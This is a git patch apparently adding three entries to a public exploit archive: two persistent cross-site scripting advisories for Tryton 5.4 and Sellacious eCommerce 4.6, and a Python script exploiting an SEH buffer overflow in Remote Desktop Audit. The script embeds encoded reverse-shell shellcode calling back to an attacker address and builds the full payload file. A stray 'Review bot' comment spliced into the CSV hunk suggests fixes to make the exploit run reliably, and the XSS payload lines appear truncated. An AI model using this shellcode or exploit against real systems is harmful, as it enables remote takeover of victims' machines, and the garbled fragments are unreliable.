From fe5d64b70c151659323f9e30589a7304d344883e Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 14 May 2020 05:01:49 +0000
Subject: [PATCH] DB: 2020-05-14 4 changes to exploits/shellcodes Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH) Tryton 5.4 - Persistent Cross-Site Scripting Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting
---
 exploits/php/webapps/48457.txt | 8 +-
 exploits/php/webapps/48466.txt | 171 ++++++++++++++++++++++++++++++++
 exploits/php/webapps/48467.txt | 138 ++++++++++++++++++++++++++
 exploits/windows/local/48465.py | 72 ++++++++++++++
 files_exploits.csv | 3 +
 5 files changed, 385 insertions(+), 7 deletions(-)
 create mode 100644 exploits/php/webapps/48466.txt
 create mode 100644 exploits/php/webapps/48467.txt
 create mode 100755 exploits/windows/local/48465.py
diff --git a/exploits/php/webapps/48457.txt b/exploits/php/webapps/48457.txt
index d654f1ff6..aa99ab715 100644
--- a/exploits/php/webapps/48457.txt
+++ b/exploits/php/webapps/48457.txt
@@ -37,10 +37,4 @@ Parameter: id (GET)
 [08:55:01] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux Ubuntu
 web application technology: Apache 2.4.29
-back-end DBMS: MySQL >= 5.0.12
-
-I am looking forward to you accepting and approving my PoC.
-
-Thankyou!
-
-Vu Tien Hoa
\ No newline at end of file
+back-end DBMS: MySQL >= 5.0.12
\ No newline at end of file
diff --git a/exploits/php/webapps/48466.txt b/exploits/php/webapps/48466.txt
new file mode 100644
index 000000000..bbc96dce0
--- /dev/null
+++ b/exploits/php/webapps/48466.txt
@@ -0,0 +1,171 @@ +# Exploit Title: Tryton 5.4 - Persistent Cross-Site Scripting +# Exploit Author: Vulnerability-Lab +# Date: 2020-05-13 +# Vendor Homepage: https://www.tryton.org/ +# Version: 5.4 +# Software Link: https://www.tryton.org/download + + +Document Title: +=============== +Tryton v5.4 - (Name) Persistent Cross Site Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2233 + + +Common Vulnerability Scoring System: +==================================== +4.4 + + +Product & Service Introduction: +=============================== +https://www.tryton.org/ & https://www.tryton.org/download + + +Affected Product(s): +==================== +Tryton Foundation +Product: Tryton v5.4 - CMS (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2020-05-12: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +A persistent input validation web vulnerability has been discovered in +the official Tryton v5.4 web-application series. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise +browser to web-application requests from the application-side. + +The persistent vulnerability is located in the `name` parameter of the +`User Profile` module. Remote attackers with low +privileges are able to inject own malicious persistent script code as +name for user accounts. The injected code can be +used to attack the frontend or backend of the web-application. The +request method to inject is POST and the attack vector +is located on the application-side. Injection point is the profile input +field with the name value and the execute occurs +in the front ui on top right were the avatar is listed or in the admin +backend on the res.user;name="Users"&views. 
+ +Successful exploitation of the vulnerabilities results in session +hijacking, persistent phishing attacks, persistent +external redirects to malicious source and persistent manipulation of +affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] User Profile + +Vulnerable Input(s): +[+] Name + +Vulnerable Parameter(s): +[+] name + +Affected Module(s): +[+] /index +[+] /model/res.user;name="Users"&views (backend) + + +Proof of Concept (PoC): +======================= +The persistent web vulnerability can be exploited by low privileged web +application user account with low user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Open the application and login to your low privileged user account +2. Move to the profile on top right side (click) +3. Inject test payload to the "Name" input field and save the entry +4. Execution occurs after save on top right and +/model/res.user;name="Users"&views of the admin backend +5. Successful reproduce of the persistent cross site vulnerability! + + +PoC: Payload +%20>"> + + +PoC: Vulnerable Source (Execution Point) +
+ + + +
+ + +--- PoC Session Logs [POST] --- +https://tryton.localhost:8080/tryton/ +Host: tryton.localhost:8080 +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: application/json +Authorization: Session +ZGVtbzoyOjMyYmIyOWE3ODYxMzA3NGVkZThlMDBhNmEyMWVkNzFhZTAxOGQwMzA1YTJhMGU1NTNjOWU2YTNhZWM5MzA1MzM= +X-Requested-With: XMLHttpRequest +Content-Length: 527 +Origin: https://tryton.localhost:8080 +Connection: keep-alive +Referer: https://tryton.localhost:8080/ +{"id":195,"method":"model.res.user.set_preferences","params":[{"name":"%20>">">", +"signature":"test +signature"},{"client":"1aab6de2-1f59-43de-b0d0-a8319558e4e8","warehouse":null,"employee":null,"company":1, +"company.rec_name":"Michael Scott Paper +Company","language":"en","language_direction":"ltr","groups":[5,15,16,13,19,20,17,9,10], +"locale":{"date":"%m/%d/%Y","grouping":[3,3,0],"decimal_point":".","thousands_sep":","},"company_work_time": +{"h":3600,"m":60,"s":1,"Y":6912000,"M":576000,"w":144000,"d":28800}}]} +- +POST: HTTP/2.0 200 OK +server: nginx/1.16.1 +content-type: application/json +access-control-allow-origin: https://tryton.localhost:8080 +vary: Origin +content-encoding: gzip + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/php/webapps/48467.txt b/exploits/php/webapps/48467.txt new file mode 100644 index 000000000..d3dbd0e76 --- /dev/null +++ b/exploits/php/webapps/48467.txt 
@@ -0,0 +1,138 @@ +# Exploit Title: Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting +# Exploit Author: gurbanli +# Date: 2020-05-13 +# Vendor Homepage: https://www.sellacious.com +# Version: 4.6 +# Software Link: https://www.sellacious.com/free-open-source-ecommerce-software + +Document Title: +=============== +Sellacious eCommerce - Multiple Persistent Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2226 + + +Common Vulnerability Scoring System: +==================================== +4.6 + + +Product & Service Introduction: +=============================== +https://www.sellacious.com/free-open-source-ecommerce-software + + +Vulnerability Disclosure Timeline: +================================== +2020-05-08: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +A persistent input validation web vulnerability has been discovered in +the official Sellacious eCommerce Shop CMS (2020 Q1). +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise +browser to web-application requests from the application-side. + +The cross site web vulnerabilities are located in the all the adress +input fields of the `Manage Your Addresses` module. +Remote attackers are able to register a low privilege user account to +inject own malicious script code to the adress +information page. The execution of the script code occurs each time the +adress information is used in the web ui of +the ecommerce application. The request method to inject is POST and the +attack vector is persistent on the application-side. + +Successful exploitation of the vulnerabilities results in session +hijacking, persistent phishing attacks, persistent +external redirects to malicious source and persistent manipulation of +affected application modules. 
+ +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Manage Your Addresses + +Vulnerable Input(s): +[+] Full name +[+] First name +[+] Middle name +[+] Last name +[+] Company +[+] PO Box +[+] Address +[+] Landmark + +Affected(s): +[+] index.php/manage-your-addresses +[+] Backend user adress information listing + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerabilities can be exploited by +remote attackers with user account and low user interaction. +For security demonstration or to reproduce the web vulnerability follow +the provided information and steps below to continue. + + +PoC: Exploitation + +
+
+
+ + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/windows/local/48465.py b/exploits/windows/local/48465.py new file mode 100755 index 000000000..b8b2e6ac4 --- /dev/null +++ b/exploits/windows/local/48465.py 
@@ -0,0 +1,72 @@
+# Exploit Title: Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)
+# Exploit Author: gurbanli
+# Date: 2020-05-12
+# Vulnerable Software: Remote Desktop Audit 2.3.0.157
+# Vendor Homepage: https://lizardsystems.com
+# Version: 2.3.0.157
+# Software Link: https://lizardsystems.com/download/rdaudit_setup.exe
+# Tested on: Windows 7 x86
+f = file('payload.txt','w')
+
+"""
+Same with LanSend 3.2, but with different ppr address.
+PoC
+1. Run exploit
+2. Run Remote Desktop Audit and Click Add Computers Wizard
+3. Choose import computers from file
+4. Copy/paste payload.txt content into filename section
+5. shellcode will be executed
+
+"""
+
+"""
+msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b '\x00\x0a\x0d'
+"""
+
+shellcode = b""
+shellcode += b"\xda\xd0\xd9\x74\x24\xf4\x58\xbe\xa4\x95\xaf"
+shellcode += b"\xc4\x2b\xc9\xb1\x52\x31\x70\x17\x03\x70\x17"
+shellcode += b"\x83\x4c\x69\x4d\x31\x70\x7a\x10\xba\x88\x7b"
+shellcode += b"\x75\x32\x6d\x4a\xb5\x20\xe6\xfd\x05\x22\xaa"
+shellcode += b"\xf1\xee\x66\x5e\x81\x83\xae\x51\x22\x29\x89"
+shellcode += b"\x5c\xb3\x02\xe9\xff\x37\x59\x3e\xdf\x06\x92"
+shellcode += b"\x33\x1e\x4e\xcf\xbe\x72\x07\x9b\x6d\x62\x2c"
+shellcode += b"\xd1\xad\x09\x7e\xf7\xb5\xee\x37\xf6\x94\xa1"
+shellcode += b"\x4c\xa1\x36\x40\x80\xd9\x7e\x5a\xc5\xe4\xc9"
+shellcode += b"\xd1\x3d\x92\xcb\x33\x0c\x5b\x67\x7a\xa0\xae"
+shellcode += b"\x79\xbb\x07\x51\x0c\xb5\x7b\xec\x17\x02\x01"
+shellcode += b"\x2a\x9d\x90\xa1\xb9\x05\x7c\x53\x6d\xd3\xf7"
+shellcode += b"\x5f\xda\x97\x5f\x7c\xdd\x74\xd4\x78\x56\x7b"
+shellcode += b"\x3a\x09\x2c\x58\x9e\x51\xf6\xc1\x87\x3f\x59"
+shellcode += b"\xfd\xd7\x9f\x06\x5b\x9c\x32\x52\xd6\xff\x5a"
+shellcode += b"\x97\xdb\xff\x9a\xbf\x6c\x8c\xa8\x60\xc7\x1a"
+shellcode += b"\x81\xe9\xc1\xdd\xe6\xc3\xb6\x71\x19\xec\xc6"
+shellcode += b"\x58\xde\xb8\x96\xf2\xf7\xc0\x7c\x02\xf7\x14"
+shellcode += b"\xd2\x52\x57\xc7\x93\x02\x17\xb7\x7b\x48\x98"
+shellcode += b"\xe8\x9c\x73\x72\x81\x37\x8e\x15\x02\xd7\xda"
+shellcode += b"\x65\x32\xda\xda\x74\x9f\x53\x3c\x1c\x0f\x32"
+shellcode += b"\x97\x89\xb6\x1f\x63\x2b\x36\x8a\x0e\x6b\xbc"
+shellcode += b"\x39\xef\x22\x35\x37\xe3\xd3\xb5\x02\x59\x75"
+shellcode += b"\xc9\xb8\xf5\x19\x58\x27\x05\x57\x41\xf0\x52"
+shellcode += b"\x30\xb7\x09\x36\xac\xee\xa3\x24\x2d\x76\x8b"
+shellcode += b"\xec\xea\x4b\x12\xed\x7f\xf7\x30\xfd\xb9\xf8"
+shellcode += b"\x7c\xa9\x15\xaf\x2a\x07\xd0\x19\x9d\xf1\x8a"
+shellcode += b"\xf6\x77\x95\x4b\x35\x48\xe3\x53\x10\x3e\x0b"
+shellcode += b"\xe5\xcd\x07\x34\xca\x99\x8f\x4d\x36\x3a\x6f"
+shellcode += b"\x84\xf2\x5a\x92\x0c\x0f\xf3\x0b\xc5\xb2\x9e"
+shellcode += b"\xab\x30\xf0\xa6\x2f\xb0\x89\x5c\x2f\xb1\x8c"
+shellcode += b"\x19\xf7\x2a\xfd\x32\x92\x4c\x52\x32\xb7"
+
+"""
+047FFF09 59 POP ECX
+047FFF0A 59 POP ECX
+047FFF0B 80C1 64 ADD CL,64
+047FFF0E ^FFE1 JMP ECX
+"""
+jmp_to_shellcode = '\x59\x59\x80\xc1\x64\xff\xe1'
+
+"""ppr 00418230"""
+
+payload = '\x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + '\xeb\xeb\x90\x90' + '\x30\x82\x41'
+f.write(payload)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a6ab436ac..d9ca816fd 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
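Review bot: The script only runs under Python 2, which the header block does not state: `file('payload.txt','w')` does not exist in Python 3, and `payload` concatenates `str` literals with the `bytes` shellcode, which raises TypeError there. Add a line such as `# Python Version: 2.7` below `# Tested on: Windows 7 x86`. The output file is also opened in text mode on the first code line and written only on the last, so any exception in between leaves an empty payload.txt, and on Windows text mode rewrites a `\x0a` byte as `\r\n` — it works only because the badchar list in the msfvenom comment excludes that byte. Replacing the open/close pair with `with open('payload.txt', 'wb') as f:` around `f.write(payload)` makes the binary intent explicit and drops the separate `f.close()`.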
@@ -11070,6 +11070,7 @@ id,file,description,date,author,type,platform,port
 48415,exploits/windows/local/48415.py,"Frigate 3.36 - Buffer Overflow (SEH)",2020-05-04,"Xenofon Vassilakopoulos",local,windows,
 48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows,
 48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows,
+48465,exploits/windows/local/48465.py,"Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)",2020-05-13,gurbanli,local,windows,
 48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows,
 48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
@@ -42694,3 +42695,5 @@ id,file,description,date,author,type,platform,port
 48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",2020-05-12,"Dylan Garnaud",webapps,java,
 48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",2020-05-12,Besim,webapps,php,
 48462,exploits/java/webapps/48462.py,"TylerTech Eagle 2018.3.11 - Remote Code Execution",2020-05-12,"Anthony Cole",webapps,java,
+48466,exploits/php/webapps/48466.txt,"Tryton 5.4 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,
+48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,